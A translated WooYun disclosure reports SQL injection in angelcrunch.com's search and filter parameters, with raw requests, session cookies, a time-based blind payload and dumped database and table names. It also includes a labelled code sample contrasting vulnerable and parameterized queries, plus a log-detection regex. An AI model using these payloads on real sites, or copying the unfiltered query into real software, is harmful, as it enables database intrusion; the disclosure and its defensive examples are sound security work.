
Vulnerability summary

Defect ID: wooyun-2013-046924

Title: Multiple SQL injection vulnerabilities on the AngelCrunch (天使汇) main site

Vendor: angelcrunch.com

Author: 小胖子

Submitted: 2013-12-24 17:16

Fixed: 2014-02-07 17:17

Published: 2014-02-07 17:17

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-12-24: Details sent to the vendor, awaiting vendor action
2013-12-24: Vendor confirmed; details disclosed to the vendor only
2014-01-03: Details disclosed to core white hats and domain experts
2014-01-13: Details disclosed to regular white hats
2014-01-23: Details disclosed to intern white hats
2014-02-07: Details disclosed to the public

Summary:

Grabbing some WB to join the crowdsourced test~

Detailed description:

There are many injection points; register an account, log in, and inject with the session cookies attached.
Injection point 1

POST /home/search HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keyword=1


The keyword parameter is injectable.
Injection point 2 (GET injection)

GET /startup/?industryid=1 HTTP/1.1
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


The GET parameter industryid is injectable.
Injection point 3

GET /user/investor?p=0&regionid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


Basically, anywhere there is a search, there is an injection.

Proof of vulnerability:

Current database:
current database: 'angelcrunch'
Databases:
available databases [3]:
[*] angelcrunch
[*] information_schema
[*] test
Tables in the current database:

Database: angelcrunch
[75 tables]
+-------------------------+
| mc_emptoken |
| mc_usertoken |
| sq_dynamic |
| sq_user |
| startup |
| tb_blog |
| tb_blog_reply |
| tb_cafe |
| tb_cooperation_kibey |
| tb_crowdfunding |
| tb_demoday |
| tb_demoday_firm |
| tb_demoday_investor |
| tb_demoday_signup |
| tb_demoday_startup |
| tb_demoday_subscription |
| tb_dict |
| tb_disabledemail |
| tb_dynamic |
| tb_dynamic_temp |
| tb_edu_experience |
| tb_emp |
| tb_emp_role |
| tb_feedback |
| tb_feedback_email |
| tb_financing |
| tb_firm |
| tb_industry |
| tb_investor |
| tb_investor_industry |
| tb_investor_prefer |
| tb_investor_remark |
| tb_investor_service |
| tb_invite |
| tb_leadinvestor_apply |
| tb_mail |
| tb_mediareport |
| tb_msg |
| tb_notice |
| tb_privilege |
| tb_region |
| tb_resource |
| tb_role |
| tb_role_privilege |
| tb_school |
| tb_sns_bind |
| tb_startup |
| tb_startup_answer |
| tb_startup_application |
| tb_startup_comment |
| tb_startup_delivery |
| tb_startup_follow |
| tb_startup_industry |
| tb_startup_meeting |
| tb_startup_milestone |
| tb_startup_part |
| tb_startup_remark |
| tb_startup_setting |
| tb_startup_sharing |
| tb_startup_updateinfo |
| tb_startup_viewer |
| tb_startup_warmup |
| tb_startup_whitelist |
| tb_startupquestion |
| tb_sysvar |
| tb_test |
| tb_user |
| tb_user_dynamic |
| tb_user_email |
| tb_user_follow |
| tb_user_loginlog |
| tb_user_updateinfo |
| tb_wechat_bind |
| tb_wechat_show |
| tb_work_experience |
+-------------------------+

Fix recommendation:

0x1: Do a thorough site-wide review; basically no filtering was found.
0x2: Asking for 20 Rank!

Copyright notice: when reposting, please credit the source 小胖子@乌云
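Added example (not from the original report or the site's code): the search and industry filter handlers from injection points 1 and 2 written the unfiltered way beside a parameterized version, plus a small access-log check that flags the time-based probe pattern from injection point 3. The tb_startup columns, the sample rows and the log lines are constructed for illustration, not the real angelcrunch.com schema or traffic.

```python
import re
import sqlite3
from urllib.parse import unquote

def make_db():
    # Constructed in-memory stand-in for the site's database (not the real schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tb_startup (id INTEGER, name TEXT, industryid INTEGER)")
    db.executemany("INSERT INTO tb_startup VALUES (?, ?, ?)",
                   [(1, "Alpha Cafe", 1), (2, "Beta Labs", 2), (3, "Gamma AI", 1)])
    return db

def search_vulnerable(db, keyword):
    # No filtering, no binding: the keyword is spliced into the SQL text and
    # parsed as part of the statement, so a lone quote breaks the query.
    sql = "SELECT name FROM tb_startup WHERE name LIKE '%" + keyword + "%' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def query_breaks(db, keyword):
    # True when the unparameterized query fails to parse: the classic symptom
    # that user input is reaching the SQL parser.
    try:
        search_vulnerable(db, keyword)
        return False
    except sqlite3.OperationalError:
        return True

def search_safe(db, keyword):
    # Bound parameter: the keyword is only ever data, whatever it contains.
    sql = "SELECT name FROM tb_startup WHERE name LIKE ? ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + keyword + "%",))]

def startups_by_industry_safe(db, industryid):
    # Numeric GET parameters such as industryid are validated as an integer
    # before binding, so anything that is not a plain number is rejected.
    if not re.fullmatch(r"[0-9]{1,9}", str(industryid)):
        raise ValueError("industryid must be a positive integer")
    sql = "SELECT name FROM tb_startup WHERE industryid = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(industryid),))]

# Time-based comparison pattern seen in injection point 3 (now()/sysdate()/sleep()).
PROBE = re.compile(r"(?i)\b(sleep|sysdate|now)\s*\(")

def flag_injection_probes(log_lines):
    # Returns the access-log lines whose URL-decoded request carries the probe
    # pattern; a cheap way to spot blind SQLi testing in web server logs.
    return [line for line in log_lines if PROBE.search(unquote(line))]

# Constructed sample access-log lines; the second reuses the regionid query from point 3.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Dec/2013:17:00:01 +0800] "GET /startup/?industryid=1 HTTP/1.1" 200 4120',
    '198.51.100.7 - - [24/Dec/2013:17:00:09 +0800] "GET /user/investor?p=0&regionid=if(now()%3dsysdate()%2csleep(0)%2c0) HTTP/1.1" 200 88',
]
```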


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-12-24 17:25

Vendor reply:

The issue is being fixed...

Latest status:

2013-12-25: Issue fixed